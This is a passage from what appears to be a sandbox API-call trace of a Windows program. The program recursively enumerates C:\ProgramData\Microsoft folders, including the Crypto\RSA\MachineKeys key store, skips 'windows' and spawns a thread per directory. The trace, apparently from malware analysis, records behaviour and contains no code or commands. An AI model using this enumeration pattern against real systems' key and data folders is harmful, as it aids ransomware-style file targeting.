ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2970 [0045.326] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.326] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x1fb5fd30 | out: lpFindFileData=0x1fb5fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.634] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.634] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x1fb5fd30 | out: lpFindFileData=0x1fb5fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.634] FindClose (in: hFindFile=0x5e2970 | out: hFindFile=0x5e2970) returned 1 Thread: id = 478 os_tid = 0x5b8 [0045.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e29b0 [0045.326] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.326] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.326] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.326] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.327] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0045.327] lstrcmpW (lpString1=".", lpString2="MachineKeys") returned -1 [0045.327] lstrcmpW (lpString1="..", lpString2="MachineKeys") returned -1 [0045.327] lstrcmpiW (lpString1="windows", lpString2="MachineKeys") returned 1 [0047.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*" [0047.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*") returned 43 [0047.484] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", lpString2="MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" [0047.484] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*" [0047.484] GlobalMemoryStatus (in: lpBuffer=0x1fc9fd10 | out: lpBuffer=0x1fc9fd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107f01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0048.406] CloseHandle (hObject=0x3d4) returned 1 [0048.406] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0048.406] lstrcmpW (lpString1=".", lpString2="S-1-5-18") returned -1 [0048.406] lstrcmpW (lpString1="..", lpString2="S-1-5-18") returned -1 [0048.406] lstrcmpiW (lpString1="windows", lpString2="S-1-5-18") returned 1 [0048.406] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*" [0048.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*") returned 43 [0048.406] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-18" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0048.407] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0048.407] GlobalMemoryStatus (in: lpBuffer=0x1fc9fd10 | out: lpBuffer=0x1fc9fd10) [0048.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cc0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0048.422] CloseHandle (hObject=0x3d4) returned 1 [0048.422] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0048.422] FindClose (in: hFindFile=0x5e29b0 | out: hFindFile=0x5e29b0) returned 1 Thread: id = 479 os_tid = 0x508 [0045.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x1fddfd30 | out: lpFindFileData=0x1fddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3430 [0045.534] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.534] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1fddfd30 | out: lpFindFileData=0x1fddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.765] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.765] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1fddfd30 | out: lpFindFileData=0x1fddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0048.765] lstrcmpW (lpString1=".", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned -1 [0048.765] lstrcmpW (lpString1="..", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned -1 [0048.765] lstrcmpiW (lpString1="windows", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 1 [0048.768] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*" [0048.768] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*") returned 52 [0048.768] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0048.768] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0048.768] GlobalMemoryStatus (in: lpBuffer=0x1fddfd10 | out: lpBuffer=0x1fddfd10) [0048.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x249edfc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.769] CloseHandle (hObject=0x5a0) returned 1 [0048.769] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1fddfd30 | out: lpFindFileData=0x1fddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0048.769] lstrcmpW (lpString1=".", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned -1 [0048.769] lstrcmpW (lpString1="..", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned -1 [0048.769] lstrcmpiW (lpString1="windows", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 1 [0048.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*" [0048.771] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*") returned 52 [0048.771] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0048.771] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0048.771] GlobalMemoryStatus (in: lpBuffer=0x1fddfd10 | out: lpBuffer=0x1fddfd10) [0048.771] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24a06028, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.772] CloseHandle (hObject=0x5a0) returned 1 [0048.772] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1fddfd30 | out: lpFindFileData=0x1fddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0048.772] FindClose (in: hFindFile=0x5e3430 | out: hFindFile=0x5e3430) returned 1 Thread: id = 480 os_tid = 0x954 [0045.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x1ff1fd30 | out: lpFindFileData=0x1ff1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3470 [0045.534] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.534] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0x1ff1fd30 | out: lpFindFileData=0x1ff1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.779] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.779] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.779] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0x1ff1fd30 | out: lpFindFileData=0x1ff1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0048.779] lstrcmpW (lpString1=".", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned -1 [0048.779] lstrcmpW (lpString1="..", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned -1 [0048.779] lstrcmpiW (lpString1="windows", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 1 [0048.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*" [0048.781] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*") returned 50 [0048.781] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0048.781] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0048.781] GlobalMemoryStatus (in: lpBuffer=0x1ff1fd10 | out: lpBuffer=0x1ff1fd10) [0048.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24a3e090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0048.792] CloseHandle (hObject=0x304) returned 1 [0048.792] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0x1ff1fd30 | out: lpFindFileData=0x1ff1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0048.792] lstrcmpW (lpString1=".", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned -1 [0048.792] lstrcmpW (lpString1="..", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned -1 [0048.792] lstrcmpiW (lpString1="windows", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 1 [0048.794] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*" [0048.794] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*") returned 50 [0048.794] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0048.794] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0048.794] GlobalMemoryStatus (in: lpBuffer=0x1ff1fd10 | out: lpBuffer=0x1ff1fd10) [0048.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24aa61c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0048.803] CloseHandle (hObject=0x304) returned 1 [0048.803] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0x1ff1fd30 | out: lpFindFileData=0x1ff1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0048.803] FindClose (in: hFindFile=0x5e3470 | out: hFindFile=0x5e3470) returned 1 Thread: id = 481 os_tid = 0x928 [0045.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x2005fd30 | out: lpFindFileData=0x2005fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0045.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.328] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2005fd30 | out: lpFindFileData=0x2005fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.328] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.328] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2005fd30 | out: lpFindFileData=0x2005fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.328] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 482 os_tid = 0x99c [0045.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x2019fd30 | out: lpFindFileData=0x2019fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0045.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.328] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2019fd30 | out: lpFindFileData=0x2019fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.329] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.329] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.329] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2019fd30 | out: lpFindFileData=0x2019fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.329] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 483 os_tid = 0x904 [0045.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event 